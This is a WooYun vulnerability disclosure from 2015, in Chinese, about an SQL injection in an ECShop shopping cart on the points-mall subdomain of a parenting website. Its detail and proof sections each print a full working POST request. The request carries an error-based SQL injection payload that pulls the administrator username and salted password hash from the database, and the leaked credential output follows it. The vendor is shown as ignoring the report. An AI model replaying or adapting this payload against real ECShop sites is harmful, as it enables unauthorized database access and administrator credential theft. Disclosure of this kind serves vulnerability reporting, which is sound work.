当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106767

漏洞标题:父母网某分站SQl注入

相关厂商:父母网

漏洞作者: ModNar

提交时间:2015-04-10 10:17

修复时间:2015-04-15 10:18

公开时间:2015-04-15 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

补丁不及时导致的SQL注入

详细说明:

用的是ecshop,补丁不及时导致的SQL注入
请求:
POST http://jifen.fumu.com/flow.php?step=update_cart HTTP/1.1
Host: jifen.fumu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 337
goods_number%5B1%27 and %28select 1 from%28select count%28*%29%2Cconcat%28%28select %28select %28SELECT concat%28user_name%2C0x7c%2Cpassword%29 FROM ecs_admin_user limit 0%2C1%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29*2%29%29x from information_schema.tables group by x%29a%29 and 1%3D1 %23%5D=1&submit=exp
响应:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code`, use_integral FROM`fumu_jifen`.`ecs_cart` WHERE rec_id='1' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #' AND session_id='95238a2aebc1ff5d1a38e2f44cbe442c' ) [2] => Array ( [error] => Duplicate entry 'admin|c49803e7dffa2410f86139c9115225d31' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )
admin|c49803e7dffa2410f86139c9115225d31
可见爆出了用户名和salt后的密码
未继续深入

漏洞证明:

请求:
POST http://jifen.fumu.com/flow.php?step=update_cart HTTP/1.1
Host: jifen.fumu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 337
goods_number%5B1%27 and %28select 1 from%28select count%28*%29%2Cconcat%28%28select %28select %28SELECT concat%28user_name%2C0x7c%2Cpassword%29 FROM ecs_admin_user limit 0%2C1%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29*2%29%29x from information_schema.tables group by x%29a%29 and 1%3D1 %23%5D=1&submit=exp
响应:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code`, use_integral FROM`fumu_jifen`.`ecs_cart` WHERE rec_id='1' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #' AND session_id='95238a2aebc1ff5d1a38e2f44cbe442c' ) [2] => Array ( [error] => Duplicate entry 'admin|c49803e7dffa2410f86139c9115225d31' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )
admin|c49803e7dffa2410f86139c9115225d31
可见爆出了用户名和salt后的密码

修复方案:

打官方最新补丁或根据参数改代码

版权声明:转载请注明来源 ModNar@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-15 10:18

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无